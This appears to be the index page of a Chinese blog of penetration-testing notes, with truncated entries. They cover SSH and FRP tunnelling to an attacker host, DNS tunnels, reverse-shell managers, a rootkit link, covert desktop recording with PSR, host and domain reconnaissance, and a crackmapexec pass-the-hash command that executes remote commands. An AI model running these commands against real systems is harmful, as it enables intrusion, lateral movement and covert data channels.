SSH转发
2021年12月27日 No comment本地访问127.0.0.1:port1就是host:port2(用的更多)
ssh -CfNg -L port1:127.0.0.1:port2 user@host #本地转发
访问host:port2就是访问127.0.0.1:port1
ssh -CfNg -R port2:127.0.0.1:port1 user@host &
阅读全文 »
brootkit
2021年12月25日 No commenthttps://github.com/cloudsec/brootkit https://blog.csdn.net/whatday/article/details/54298501
阅读全文 »
反弹shell管理工具
2021年12月24日 No commenthttps://github.com/WangYihang/Reverse-Shell-Manager https://github.com/WangYihang/Platypus/releases/ 使用说明https://platypus-reverse-shell.vercel.app/quick-start/
阅读全文 »
DNS隧道工具
2021年12月24日 No commentiodine https://github.com/yarrick/iodine dnscat2 Type:dns解析类型 A CNAME MX TXT 分为直链模式和中继模式 gem install ecdsa gem install salsa20 gem install sha3 gem install trollop https://rubygems.org/gems
阅读全文 »
windows自带的PSR实现监控桌面
2021年12月23日 No commentpsr.exe /start /gui 0 /output C:\temp\capture.zip 开始录制
psr /stop 停止录制输出的文件是 mht 直接ie打开
阅读全文 »
端口转发python脚本
2021年12月23日 No commentlts.py -listen 80 2222lts.py -slave 10.10.10.10:80 10.10.10.10:3389#!/usr/bin/env python
# coding=utf-8
'''
===============
阅读全文 »
Linux主机信息收集
2021年12月22日 No commentlast 多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像
Ifconfig -a/arp -a/netstat -anopt/ss -nt
ifconfig -a 查看内网ip 网卡 网关
route -n 内网路由情况,也能为内网网络拓扑提供一定的信息
IPtabl
阅读全文 »
Crackmapexec
2021年12月21日 No commentkali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir 
阅读全文 »
FRP or reGeorg OR tunna
2021年12月20日 No comment利用Frp反向socks代理流量攻击机: 12.12.12.12 frps.exe ‐c frps.ini 开启监听
目标边界: 27.18.19.98  
阅读全文 »